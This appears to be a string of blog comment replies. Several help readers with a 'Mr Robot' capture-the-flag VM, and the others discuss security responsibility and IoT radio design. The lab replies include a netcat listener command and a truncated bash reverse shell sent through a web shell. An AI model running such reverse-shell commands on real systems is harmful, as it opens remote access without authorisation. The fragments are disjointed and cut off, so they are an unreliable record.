This wasn’t a 100% shot in the dark — we’d figured out ‘bill’ was a user by trying:
ls -l /home
But trying ssh here was broadly an act of desperation since I couldn’t (and haven’t) figured out exactly how the web shell was filtering commands.
So just to check we’re trying the same things here:
On your attacking machine you run:
nc -lvp 443
to set up the netcat listener.
Then on your target machine you execute (in the limited webshell):
echo ‘bash -i >&…
How are you determining the IP address you’re attacking? 10.0.2.4 was just the address that my VM picked up but yours will likely be different.
There are a number of ways that you could determine the address that your VM has picked up:
Hi — do you mean right at the very beginning? As in getting the initial ‘Mr Robot’ page to load once you’ve identified the IP in your lab?
If this is the case then I would check the hash on the VM you downloaded as it might have corrupted. If you find the correct IP address and point your browser to it then you will get the default webpage.
> I still don’t think you know if it’s accidental, a one off, a systematic issue or deliberate.
Wasn’t that part of the point, though?
Whose responsibility is it to establish these facts? The victims? The bystanders? The regulator?
Hi — interesting idea on the second radio channel, but doesn’t this just perpetuate the initial problem — that of insecure implementation of comms — rather than solve it?
If I, a low-cost, high-volume IoT device manufacturer, cannot or will not implement the correct security controls on my primary radio, why would I a) add a…